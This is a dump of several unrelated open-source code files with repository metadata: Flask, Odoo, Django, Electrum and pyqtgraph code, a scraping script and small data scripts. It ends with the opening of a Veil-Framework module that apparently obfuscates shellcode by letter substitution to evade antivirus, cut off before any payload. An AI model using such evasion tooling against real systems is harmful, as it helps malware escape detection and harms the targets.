words_pos['es'].append(translator.translate(en, dest='es').text)
df_neg['pt'] = words_neg['pt']
df_neg['en'] = words_neg['en']
df_neg['es'] = words_neg['es']
df_neu['pt'] = words_neu['pt']
df_neu['en'] = words_neu['en']
df_neu['es'] = words_neu['es']
df_pos['pt'] = words_pos['pt']
df_pos['en'] = words_pos['en']
df_pos['es'] = words_pos['es']
write_csv(df_neg,'bigram_neg')
write_csv(df_neu,'bigram_neu')
write_csv(df_pos,'bigram_pos')
| gpl-3.0 | -3,722,365,995,457,834,500 | 26.039773 | 133 | 0.566085 | false | 2.735057 | false | false | false |
evereux/flask_template | application/models.py | 1 | 2773 | import datetime
from application import db
from config import admin_group_name
Base = db.Model
username_maxlength = 24
name_maxlength = 60
email_maxlength = 24
group_maxlength = 64
groups = db.Table('groups',
db.Column('user_id', db.Integer, db.ForeignKey('users.id')),
db.Column('group_id', db.Integer, db.ForeignKey('group.id'))
)
class User(Base):
# defines tablename as it will be create in SQL
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(username_maxlength), index=True, unique=True)
name = db.Column(db.String(name_maxlength))
password = db.Column(db.LargeBinary(60))
email = db.Column(db.String(email_maxlength), unique=True)
date_added = db.Column(db.DateTime)
date_modified = db.Column(db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, username, name, email, password):
self.username = username
self.name = name
self.password = password
self.email = email
def __repr__(self):
return '<User {}>'.format(self.username)
@property
def is_authenticated(self):
return True
@property
def is_active(self):
return True
@property
def is_anonymous(self):
return False
@property
def is_admin(self):
""" returns true if the user is a member of the 'admin' group"""
user = User.query.filter_by(id = self.id).first()
for g in user.groups:
if g.group_name == admin_group_name:
return True
def get_id(self):
return str(self.id)
class Group(Base):
id = db.Column(db.Integer, primary_key=True)
group_name = db.Column(db.String(group_maxlength))
users = db.relationship('User',
secondary=groups,
backref=db.backref('groups',
lazy='dynamic',
order_by=group_name
)
)
# this is for when a group has many groups
# ie everyone in group 'admin' can be a member of group 'all'
# parents = db.relationship('Group',
# secondary=group_to_group,
# primaryjoin=id==group_to_group.c.parent_id,
# secondaryjoin=id==group_to_group.c.child_id,
# backref="children",
# remote_side=[group_to_group.c.parent_id])
def __init__(self, group_name):
self.group_name = group_name
@property
def __repr__(self):
return self.group_name
| mit | 7,453,348,614,232,633,000 | 29.472527 | 80 | 0.547782 | false | 4.030523 | false | false | false |
bringsvor/bc_website_purchase | controllers/main.py | 1 | 11590 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
import werkzeug
import datetime
import time
import logging
import base64
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class purchase_quote(http.Controller):
@http.route([
"/purchase/<int:order_id>",
"/purchase/<int:order_id>/<token>"
], type='http', auth="public", website=True)
def view(self, order_id, token=None, message=False, **post):
# use SUPERUSER_ID allow to access/view order for public user
# only if he knows the private token
user_obj = request.registry.get('res.users')
group_obj = request.registry.get('res.groups')
user = user_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, request.uid)
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, token and SUPERUSER_ID or request.uid, order_id)
now = time.strftime('%Y-%m-%d')
"""
if token:
if token != order.access_token:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier ')
self.__message_post(body, order_id, type='comment')
"""
# if token is None and ( request.uid==user.id and user.active==False ):
if ( request.uid==user.id and user.active==False ):
if request.env.ref('web.login', False):
values = request.params.copy() or {}
values["redirect"] = "/purchase/%i" % (order_id);
return request.render('web.login', values)
# Checks groups
broker = False
# import pdb;pdb.set_trace()
for group_id in user.groups_id:
group = group_obj.browse(request.cr,token and SUPERUSER_ID or request.uid, group_id.id)
if group.name == 'Elmatica Broker':
broker = True
if not broker:
partner_id = user.partner_id.parent_id.id or user.partner_id.id
if partner_id and request.uid != SUPERUSER_ID:
if partner_id != order.partner_id.id:
return request.website.render('website.404')
else:
if request.uid != SUPERUSER_ID:
return request.website.render('website.404')
if request.session.get('view_quote',False)!=now:
request.session['view_quote'] = now
body=_('Quotation viewed by supplier')
self.__message_post(body, order_id, type='comment')
# If the supplier is viewing this, he has received it. If he has received it it must be sent
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'send_rfq', context=request.context)
days = 0
if order.validity_date:
days = (datetime.datetime.strptime(order.validity_date, '%Y-%m-%d') - datetime.datetime.now()).days + 1
values = {
'quotation': order,
'message': message and int(message) or False,
'option': bool(filter(lambda x: not x.line_id, order.options)),
'order_valid': (not order.validity_date) or (now <= order.validity_date),
'days_valid': max(days, 0)
}
return request.website.render('bc_website_purchase.po_quotation', values)
# @http.route(['/purchase/accept'], type='json', auth="public", website=True)
@http.route(['/purchase/<int:order_id>/<token>/accept'], type='http', auth="public", website=True)
def accept(self, order_id, token=None, signer=None, sign=None, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
attachments=sign and [('signature.png', sign.decode('base64'))] or []
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
message = _('RFQ signed by %s') % (signer,)
self.__message_post(message, order_id, type='comment', subtype='mt_comment', attachments=attachments)
return werkzeug.utils.redirect("/purchase/%s" % (order_id))
@http.route(['/purchase/<int:order_id>/<token>/decline'], type='http', auth="public", website=True)
def decline(self, order_id, token, **post):
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
if token != order.access_token:
return request.website.render('website.404')
request.registry.get('purchase.order').action_cancel(request.cr, SUPERUSER_ID, [order_id])
message = post.get('decline_message')
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment')
return werkzeug.utils.redirect("/purchase/%s/%s?message=2" % (order_id, token))
@http.route(['/purchase/<int:order_id>/<token>/post'], type='http', auth="public", website=True)
def post(self, order_id, token, **post):
# use SUPERUSER_ID allow to access/view order for public user
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID, order_id)
message = post.get('comment')
ufile = post.get('attachment')
attachment_ids = []
kwargs = {}
if token != order.access_token:
return request.website.render('website.404')
if ufile:
Model = request.session.model('ir.attachment')
try:
data_attach = {
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': 'purchase.order',
'res_id': int(order_id)
}
attachment_id = Model.create( data_attach, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
#attachment_ids.append((0, 0, data_attach))
attachment_ids.append(attachment_id)
kwargs = { 'attachment_ids': attachment_ids }
except Exception:
args = {'error': "Something horrible happened"}
_logger.exception("Fail to upload attachment %s" % ufile.filename)
return werkzeug.utils.redirect("/purchase/%s/%s?message=0" % (order_id, token))
if message:
self.__message_post(message, order_id, type='comment', subtype='mt_comment',**kwargs)
return werkzeug.utils.redirect("/purchase/%s/%s?message=1" % (order_id, token))
# def __message_post(self, message, order_id, type='comment', subtype=False, attachments=[]):
def __message_post(self, message, order_id, type='comment', subtype=False, **kwargs):
request.session.body = message
cr, uid, context = request.cr, request.uid, request.context
user = request.registry['res.users'].browse(cr, SUPERUSER_ID, uid, context=context)
if 'body' in request.session and request.session.body:
request.registry.get('purchase.order').message_post(cr, SUPERUSER_ID, order_id,
body=request.session.body,
type=type,
subtype=subtype,
author_id=user.partner_id.id,
context=context,
attachments=None,
parent_id=False,
subject=None,
content_subtype='html',
**kwargs
)
request.session.body = False
return True
@http.route(['/purchase/update_line'], type='json', auth="public", website=True)
# def update_line(self, update_data, **post):
def update_line(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent'):
return False
# import pdb;pdb.set_trace()
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
try:
leadtime = post['leadtime'][i]
except:
leadtime = 0
pass
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
'leadtime': leadtime,
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.signal_workflow(request.cr, SUPERUSER_ID, [order_id], 'bid_received', context=request.context)
return True
@http.route(['/purchase/save'], type='json', auth="public", website=True)
def save(self, **post):
order_id = post['order_id']
post_length = len(post['line_id'])
order_obj = request.registry.get('purchase.order')
order = order_obj.browse(request.cr, SUPERUSER_ID or request.uid, order_id)
if order.state not in ('draft','sent','confirmed','approved'):
return False
for i in range(len(post['line_id'])):
line_id = post['line_id'][i]
#try:
# leadtime = post['leadtime'][i]
#except:
# leadtime = 0
# pass
if order.state in ('draft','sent'):
price_unit = post['price_unit'][i]
vals = {
'price_unit': price_unit,
# 'leadtime': leadtime,
}
else:
vals = {
'date_code': post['date_code'][i],
'units_shipped': post['units_shipped'][i],
'weight': post['weight'][i],
'collies': post['collies'][i],
'units_in_stock': post['units_in_stock'][i],
'lot_week': post['lot_week'][i],
'lot_year': post['lot_year'][i],
'batch_number': post['batch_number'][i],
'tracking_number': post['tracking_number'][i],
'date_code': post['date_code'][i],
'expiry_date': post['expiry_date'][i],
}
line_id=int(line_id)
order_line_obj = request.registry.get('purchase.order.line')
order_line_obj.write(request.cr, SUPERUSER_ID, [line_id], vals, context=request.context)
order_obj.write(request.cr,SUPERUSER_ID,[order_id],{'saved': True},context=request.context)
return True
@http.route(["/purchase/template/<model('purchase.quote.template'):quote>"], type='http', auth="user", website=True)
def template_view(self, quote, **post):
values = { 'template': quote }
return request.website.render('bc_website_purchase.po_template', values)
| agpl-3.0 | -1,163,517,802,710,959,900 | 41.925926 | 120 | 0.605091 | false | 3.65846 | false | false | false |
philanthropy-u/edx-platform | openedx/features/partners/admin.py | 1 | 1216 | from django.contrib import admin
from django.urls import reverse
from .models import Partner, PartnerCommunity, PartnerUser
class PartnerAdmin(admin.ModelAdmin):
"""
Django admin customizations for Partner model
"""
list_display = ('id', 'label', 'slug', 'partner_url')
readonly_fields = ('partner_url',)
def partner_url(self, obj):
if obj.slug:
return reverse('partner_url', kwargs={'slug': obj.slug})
class PartnerUserModelAdmin(admin.ModelAdmin):
"""
Django admin to verify if user is affiliated with partner or not after login or registration
"""
raw_id_fields = ('user',)
class PartnerCommunityModelAdmin(admin.ModelAdmin):
"""
Django admin model to add community id to partner so that every user is added automatically to that community
"""
list_display = ['id', 'partner', 'community_id']
search_fields = ('partner', 'community_id')
class Meta(object):
verbose_name = 'Partner Community'
verbose_name_plural = 'Partner Communities'
admin.site.register(Partner, PartnerAdmin)
admin.site.register(PartnerCommunity, PartnerCommunityModelAdmin)
admin.site.register(PartnerUser, PartnerUserModelAdmin)
| agpl-3.0 | 6,408,310,665,756,646,000 | 28.658537 | 113 | 0.702303 | false | 4.251748 | false | false | false |
vialectrum/vialectrum | electrum_ltc/gui/qt/seed_dialog.py | 1 | 9848 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QCheckBox, QHBoxLayout, QLineEdit,
QLabel, QCompleter, QDialog, QStyledItemDelegate)
from electrum_ltc.i18n import _
from electrum_ltc.mnemonic import Mnemonic, seed_type
from electrum_ltc import old_mnemonic
from .util import (Buttons, OkButton, WWLabel, ButtonsTextEdit, icon_path,
EnterButton, CloseButton, WindowModalDialog, ColorScheme)
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .completion_text_edit import CompletionTextEdit
def seed_warning_msg(seed):
return ''.join([
"<p>",
_("Please save these {0} words on paper (order is important). "),
_("This seed will allow you to recover your wallet in case "
"of computer failure."),
"</p>",
"<b>" + _("WARNING") + ":</b>",
"<ul>",
"<li>" + _("Never disclose your seed.") + "</li>",
"<li>" + _("Never type it on a website.") + "</li>",
"<li>" + _("Do not store it electronically.") + "</li>",
"</ul>"
]).format(len(seed.split()))
class SeedLayout(QVBoxLayout):
def seed_options(self):
dialog = QDialog()
vbox = QVBoxLayout(dialog)
if 'ext' in self.options:
cb_ext = QCheckBox(_('Extend this seed with custom words'))
cb_ext.setChecked(self.is_ext)
vbox.addWidget(cb_ext)
if 'bip39' in self.options:
def f(b):
self.is_seed = (lambda x: bool(x)) if b else self.saved_is_seed
self.is_bip39 = b
self.on_edit()
if b:
msg = ' '.join([
'<b>' + _('Warning') + ':</b> ',
_('BIP39 seeds can be imported in Electrum, so that users can access funds locked in other wallets.'),
_('However, we do not generate BIP39 seeds, because they do not meet our safety standard.'),
_('BIP39 seeds do not include a version number, which compromises compatibility with future software.'),
_('We do not guarantee that BIP39 imports will always be supported in Electrum.'),
])
else:
msg = ''
self.seed_warning.setText(msg)
cb_bip39 = QCheckBox(_('BIP39 seed'))
cb_bip39.toggled.connect(f)
cb_bip39.setChecked(self.is_bip39)
vbox.addWidget(cb_bip39)
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
self.is_ext = cb_ext.isChecked() if 'ext' in self.options else False
self.is_bip39 = cb_bip39.isChecked() if 'bip39' in self.options else False
def __init__(self, seed=None, title=None, icon=True, msg=None, options=None,
is_seed=None, passphrase=None, parent=None, for_seed_words=True):
QVBoxLayout.__init__(self)
self.parent = parent
self.options = options
if title:
self.addWidget(WWLabel(title))
if seed: # "read only", we already have the text
if for_seed_words:
self.seed_e = ButtonsTextEdit()
else: # e.g. xpub
self.seed_e = ShowQRTextEdit()
self.seed_e.setReadOnly(True)
self.seed_e.setText(seed)
else: # we expect user to enter text
assert for_seed_words
self.seed_e = CompletionTextEdit()
self.seed_e.setTabChangesFocus(False) # so that tab auto-completes
self.is_seed = is_seed
self.saved_is_seed = self.is_seed
self.seed_e.textChanged.connect(self.on_edit)
self.initialize_completer()
self.seed_e.setMaximumHeight(75)
hbox = QHBoxLayout()
if icon:
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("seed.png"))
.scaledToWidth(64, mode=Qt.SmoothTransformation))
logo.setMaximumWidth(60)
hbox.addWidget(logo)
hbox.addWidget(self.seed_e)
self.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addStretch(1)
self.seed_type_label = QLabel('')
hbox.addWidget(self.seed_type_label)
# options
self.is_bip39 = False
self.is_ext = False
if options:
opt_button = EnterButton(_('Options'), self.seed_options)
hbox.addWidget(opt_button)
self.addLayout(hbox)
if passphrase:
hbox = QHBoxLayout()
passphrase_e = QLineEdit()
passphrase_e.setText(passphrase)
passphrase_e.setReadOnly(True)
hbox.addWidget(QLabel(_("Your seed extension is") + ':'))
hbox.addWidget(passphrase_e)
self.addLayout(hbox)
self.addStretch(1)
self.seed_warning = WWLabel('')
if msg:
self.seed_warning.setText(seed_warning_msg(seed))
self.addWidget(self.seed_warning)
def initialize_completer(self):
bip39_english_list = Mnemonic('en').wordlist
old_list = old_mnemonic.wordlist
only_old_list = set(old_list) - set(bip39_english_list)
self.wordlist = list(bip39_english_list) + list(only_old_list) # concat both lists
self.wordlist.sort()
class CompleterDelegate(QStyledItemDelegate):
def initStyleOption(self, option, index):
super().initStyleOption(option, index)
# Some people complained that due to merging the two word lists,
# it is difficult to restore from a metal backup, as they planned
# to rely on the "4 letter prefixes are unique in bip39 word list" property.
# So we color words that are only in old list.
if option.text in only_old_list:
# yellow bg looks ~ok on both light/dark theme, regardless if (un)selected
option.backgroundBrush = ColorScheme.YELLOW.as_color(background=True)
self.completer = QCompleter(self.wordlist)
delegate = CompleterDelegate(self.seed_e)
self.completer.popup().setItemDelegate(delegate)
self.seed_e.set_completer(self.completer)
def get_seed(self):
text = self.seed_e.text()
return ' '.join(text.split())
def on_edit(self):
s = self.get_seed()
b = self.is_seed(s)
if not self.is_bip39:
t = seed_type(s)
label = _('Seed Type') + ': ' + t if t else ''
else:
from electrum_ltc.keystore import bip39_is_checksum_valid
is_checksum, is_wordlist = bip39_is_checksum_valid(s)
status = ('checksum: ' + ('ok' if is_checksum else 'failed')) if is_wordlist else 'unknown wordlist'
label = 'BIP39' + ' (%s)'%status
self.seed_type_label.setText(label)
self.parent.next_button.setEnabled(b)
# disable suggestions if user already typed an unknown word
for word in self.get_seed().split(" ")[:-1]:
if word not in self.wordlist:
self.seed_e.disable_suggestions()
return
self.seed_e.enable_suggestions()
class KeysLayout(QVBoxLayout):
def __init__(self, parent=None, header_layout=None, is_valid=None, allow_multi=False):
QVBoxLayout.__init__(self)
self.parent = parent
self.is_valid = is_valid
self.text_e = ScanQRTextEdit(allow_multi=allow_multi)
self.text_e.textChanged.connect(self.on_edit)
if isinstance(header_layout, str):
self.addWidget(WWLabel(header_layout))
else:
self.addLayout(header_layout)
self.addWidget(self.text_e)
def get_text(self):
return self.text_e.text()
def on_edit(self):
valid = False
try:
valid = self.is_valid(self.get_text())
except Exception as e:
self.parent.next_button.setToolTip(f'{_("Error")}: {str(e)}')
else:
self.parent.next_button.setToolTip('')
self.parent.next_button.setEnabled(valid)
class SeedDialog(WindowModalDialog):
def __init__(self, parent, seed, passphrase):
WindowModalDialog.__init__(self, parent, ('Vialectrum - ' + _('Seed')))
self.setMinimumWidth(400)
vbox = QVBoxLayout(self)
title = _("Your wallet generation seed is:")
slayout = SeedLayout(title=title, seed=seed, msg=True, passphrase=passphrase)
vbox.addLayout(slayout)
vbox.addLayout(Buttons(CloseButton(self)))
| mit | 6,886,666,293,626,559,000 | 40.906383 | 128 | 0.60134 | false | 3.9392 | false | false | false |
hahnicity/ace | chapter1/problem3.py | 1 | 1222 | """
Problem 3.
calculate the time series
yt = 5 + .05 * t + Et (Where E is epsilon)
for years 1960, 1961, ..., 2001 assuming Et independently and
identically distributed with mean 0 and sigma 0.2.
"""
from random import uniform
from matplotlib.pyplot import plot, show
from numpy import array, polyfit, poly1d
def create_distribution(size):
"""
Create a distribution, identically distributed, with mean 0 and
sigma 0.2
"""
# Shit it's way easier to just do some uniform distribution
# This is a bit over my head, and not possible for me without
# pen and paper
return array([uniform(-0.2, .2) for _ in xrange(size)])
def create_time_series(start_year, end_year):
"""
Create the time series, yt, then perform a regress on yt, plot yt and the
its trendline
"""
t_array = array(range(start_year, end_year + 1))
epsilon_t = create_distribution(len(t_array))
yt = array([5 + .05 * t_i + epsilon_t[i] for i, t_i in enumerate(t_array)])
fit = polyfit(t_array, yt, 1)
fit_func = poly1d(fit)
plot(t_array, yt, "yo", t_array, fit_func(t_array), "--k")
show()
def main():
create_time_series(1960, 2001)
if __name__ == "__main__":
main()
| unlicense | -3,859,389,947,506,041,300 | 25 | 79 | 0.644845 | false | 3.215789 | false | false | false |
robertsj/poropy | pyqtgraph/ThreadsafeTimer.py | 1 | 1600 | from pyqtgraph.Qt import QtCore, QtGui
class ThreadsafeTimer(QtCore.QObject):
"""
Thread-safe replacement for QTimer.
"""
timeout = QtCore.Signal()
sigTimerStopRequested = QtCore.Signal()
sigTimerStartRequested = QtCore.Signal(object)
def __init__(self):
QtCore.QObject.__init__(self)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.timerFinished)
self.timer.moveToThread(QtCore.QCoreApplication.instance().thread())
self.moveToThread(QtCore.QCoreApplication.instance().thread())
self.sigTimerStopRequested.connect(self.stop, QtCore.Qt.QueuedConnection)
self.sigTimerStartRequested.connect(self.start, QtCore.Qt.QueuedConnection)
def start(self, timeout):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "start timer", self, "from gui thread"
self.timer.start(timeout)
else:
#print "start timer", self, "from remote thread"
self.sigTimerStartRequested.emit(timeout)
def stop(self):
isGuiThread = QtCore.QThread.currentThread() == QtCore.QCoreApplication.instance().thread()
if isGuiThread:
#print "stop timer", self, "from gui thread"
self.timer.stop()
else:
#print "stop timer", self, "from remote thread"
self.sigTimerStopRequested.emit()
def timerFinished(self):
self.timeout.emit() | mit | 4,284,573,127,986,131,500 | 37.073171 | 99 | 0.6225 | false | 4.383562 | false | false | false |
glaserti/LibraryTwitter | Python/1 - CSV from HTMLsource.py | 1 | 7213 | #
# Scraping website for information about libraries
#
# For getting information about the libraries, the database of the German Library Statistics (Deutsche Bibliotheksstatistik/DBS) which is hosted by the HBZ was used:
#
# http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/bibs.php
#
# For this project, 4 different requests were made:
#
# 1. DBS National Libraries ( == > 3 active<sup>(1)</sup> libraries)
# 1. DBS Section 4: University Libraries (i.e. not the entire Section 4 was queried) ( == > 83 active<sup>(2)</sup> libraries)
# 1. DBS Section 1: Public Libraries with population > 400,000 ( == > 18 libraries)<sup>(3)</sup>
# 1. DBS Section 2: Public Libraries with population > 100,000 ( == > 81 libraries)<sup>(4)</sup>
#
# Since the website doesn't give unique URLs for individual requests,
# you could download the source code of each database request and safe as html files.
#
# However, you could use the _printing page_ of the database result list, which returns
# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small "ehrenamtlich geführte" libraries (less than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out, what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while type(s0) != type(None): # first write each entry which is not NoneType to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if type(si) != type(None): # to a List of Dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
pass as argument the index number of the urlList
prints out
(1.) Nr. of (active) libraries in the list
(2.) A JSON prettyprint list of libraries without a valid url
(3.) The name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
l1 = len(filename) + len('The csv will be safed as ')
print "\n"+ l1*"=" + "\n"
print 'The csv will be safed as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
| mit | 6,047,267,657,044,713,000 | 43.239264 | 611 | 0.675912 | false | 2.966269 | false | false | false |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode, and replaces the a hex character
with a random non hex letter. At runtime,
the executables reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
